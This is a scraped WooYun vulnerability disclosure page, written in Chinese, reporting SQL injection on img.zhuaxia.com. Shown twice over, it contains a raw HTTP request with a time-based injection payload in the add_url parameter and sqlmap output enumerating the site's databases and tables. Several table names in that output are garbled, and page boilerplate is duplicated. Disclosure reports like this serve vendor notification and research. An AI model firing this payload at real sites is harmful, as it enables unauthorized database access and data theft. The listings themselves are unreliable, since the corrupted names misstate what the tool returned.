抓虾网某站注入 | wooyun-2015-0120463| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0120463

漏洞标题：抓虾网某站注入

漏洞作者：路人甲

提交时间：2015-06-14 20:04

修复时间：2015-07-30 11:32

公开时间：2015-07-30 11:32

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-14：细节已通知厂商并且等待厂商处理中
2015-06-15：厂商已经确认，细节仅向厂商公开
2015-06-25：细节向核心白帽子及相关领域专家公开
2015-07-05：细节向普通白帽子公开
2015-07-15：细节向实习白帽子公开
2015-07-30：细节向公众公开

简要描述：

详细说明：

img.zhuaxia.com存在问题的站点，我们抓个包

GET /guest_reg.php?add_url=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&from=addExternalChannel HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://img.zhuaxia.com:80/
Cookie: zid=6f4c612d2d38a279
Host: img.zhuaxia.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

sqlmap跑一跑

Database: dba
[1 table]
+---------------------------------------+
| heartbeat                             |
+---------------------------------------+
Database: crawler
[14 tables]
+---------------------------------------+
| channel_level                         |
| channel_mem                           |
| channel_source                        |
| channel_source_old                    |
| flink_bsp                             |
| flink_bsp_keyword                     |
| flink_keyword                         |
| item_mem                              |
| item_mem_extend                       |
| item_source                           |
| ping_record                           |
| proxy                                 |
| proxy_domain                          |
| rsu_item_source                       |
+---------------------------------------+
Database: information_schema
[65 tables]
+---------------------------------------+
| CHARACTER_SEYS                        |
| CLIENT_STATISTICS                     |
| COLLATIONS                            |
| COLLATION_CHCRACTER_SET_APPLICABILITY |
| COLLMNS                               |
| COLUMN_PRMVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FIQES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| INDEX_STATISTICS                      |
| INNODB_BUFFER_PAGE                    |
| INNODB_BUFFER_PAGE_LRU                |
| INNODB_BUFFER_POOL_PAGES              |
| INNODB_BUFFER_POOL_PAGES_BLOB         |
| INNODB_BUFFER_POOLaSTATS              |
| INNODB_BaFFER_POOL_PAGES_INDEX        |
| INNODB_CHANGED_PAGES                  |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMP_RESET                      |
| INNODB_LNDEY_STATS                    |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_RSEG                           |
| INNODB_SYS_COLUMNS                    |
| INNODB_SYS_FIELDS                     |
| INNODB_SYS_FOREIGN                    |
| INNODB_SYS_FOREIGN_COLS               |
| INNODB_SYS_INDEXES                    |
| INNODB_SYS_STAaS                      |
| INNODB_SYS_TABLES                     |
| INNODB_SYS_TABLESTATS                 |
| INNODB_TRX                            |
| INNODB_UNDO_LOGS                      |
| INNODs_CMPMEM_RESET                   |
| INNPDB_TABLE_STATS                    |
| KEY_COLUMN_USAGG                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PROCESSLIST                           |
| PROFILING                             |
| QUERY_RESPONSE_TIME                   |
| ROUTINES                              |
| SCHEMA_PRIVILEGES                     |
| SCHEaATA                              |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TABLE_STATISTICS                      |
| THREAD_STATISTICS                     |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| USER_STATISTICS                       |
| VIEWS                                 |
| XTRADB_ADMIN_COMMAND                  |
| GLOBAL_TEMPORAR\\_TABLES              |
| PLUGINS\x03                           |
| REFERENTIAL_CONSTRAINTS\t             |
| TEMPOA_Y_TABLES                       |
+---------------------------------------+
Database: mysql
[24 tables]
+---------------------------------------+
| user                                  |
| columns_priv                          |
| db                                    |
| event                                 |
| func                                  |
| general_log                           |
| help_category                         |
| help_keyyord                          |
| help_relation                         |
| help_topic                            |
| host                                  |
| ndb_binloi_index                      |
| pluginA                               |
| proc                                  |
| procs_priv                            |
| proxqes_priv                          |
| servers                               |
| slow_loi                              |
| tables_priv                           |
| tame_zone                             |
| time_zone_leap_second                 |
| time_zone_name                        |
| time_zone_transition_type             |
| time_zone_tsansition                  |
+---------------------------------------+

漏洞证明：

img.zhuaxia.com存在问题的站点，我们抓个包

GET /guest_reg.php?add_url=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&from=addExternalChannel HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://img.zhuaxia.com:80/
Cookie: zid=6f4c612d2d38a279
Host: img.zhuaxia.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

sqlmap跑一跑

Database: dba
[1 table]
+---------------------------------------+
| heartbeat                             |
+---------------------------------------+
Database: crawler
[14 tables]
+---------------------------------------+
| channel_level                         |
| channel_mem                           |
| channel_source                        |
| channel_source_old                    |
| flink_bsp                             |
| flink_bsp_keyword                     |
| flink_keyword                         |
| item_mem                              |
| item_mem_extend                       |
| item_source                           |
| ping_record                           |
| proxy                                 |
| proxy_domain                          |
| rsu_item_source                       |
+---------------------------------------+
Database: information_schema
[65 tables]
+---------------------------------------+
| CHARACTER_SEYS                        |
| CLIENT_STATISTICS                     |
| COLLATIONS                            |
| COLLATION_CHCRACTER_SET_APPLICABILITY |
| COLLMNS                               |
| COLUMN_PRMVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FIQES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| INDEX_STATISTICS                      |
| INNODB_BUFFER_PAGE                    |
| INNODB_BUFFER_PAGE_LRU                |
| INNODB_BUFFER_POOL_PAGES              |
| INNODB_BUFFER_POOL_PAGES_BLOB         |
| INNODB_BUFFER_POOLaSTATS              |
| INNODB_BaFFER_POOL_PAGES_INDEX        |
| INNODB_CHANGED_PAGES                  |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMP_RESET                      |
| INNODB_LNDEY_STATS                    |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_RSEG                           |
| INNODB_SYS_COLUMNS                    |
| INNODB_SYS_FIELDS                     |
| INNODB_SYS_FOREIGN                    |
| INNODB_SYS_FOREIGN_COLS               |
| INNODB_SYS_INDEXES                    |
| INNODB_SYS_STAaS                      |
| INNODB_SYS_TABLES                     |
| INNODB_SYS_TABLESTATS                 |
| INNODB_TRX                            |
| INNODB_UNDO_LOGS                      |
| INNODs_CMPMEM_RESET                   |
| INNPDB_TABLE_STATS                    |
| KEY_COLUMN_USAGG                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PROCESSLIST                           |
| PROFILING                             |
| QUERY_RESPONSE_TIME                   |
| ROUTINES                              |
| SCHEMA_PRIVILEGES                     |
| SCHEaATA                              |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TABLE_STATISTICS                      |
| THREAD_STATISTICS                     |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| USER_STATISTICS                       |
| VIEWS                                 |
| XTRADB_ADMIN_COMMAND                  |
| GLOBAL_TEMPORAR\\_TABLES              |
| PLUGINS\x03                           |
| REFERENTIAL_CONSTRAINTS\t             |
| TEMPOA_Y_TABLES                       |
+---------------------------------------+
Database: mysql
[24 tables]
+---------------------------------------+
| user                                  |
| columns_priv                          |
| db                                    |
| event                                 |
| func                                  |
| general_log                           |
| help_category                         |
| help_keyyord                          |
| help_relation                         |
| help_topic                            |
| host                                  |
| ndb_binloi_index                      |
| pluginA                               |
| proc                                  |
| procs_priv                            |
| proxqes_priv                          |
| servers                               |
| slow_loi                              |
| tables_priv                           |
| tame_zone                             |
| time_zone_leap_second                 |
| time_zone_name                        |
| time_zone_transition_type             |
| time_zone_tsansition                  |
+---------------------------------------+

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-06-15 11:30

厂商回复：

多谢，立即组织修复

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0120463

漏洞标题：抓虾网某站注入

相关厂商：zhuaxia.com

漏洞作者：路人甲

提交时间：2015-06-14 20:04

修复时间：2015-07-30 11:32

公开时间：2015-07-30 11:32

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0120463

漏洞标题：抓虾网某站注入

相关厂商：zhuaxia.com

漏洞作者： 路人甲

提交时间：2015-06-14 20:04

修复时间：2015-07-30 11:32

公开时间：2015-07-30 11:32

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0120463"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云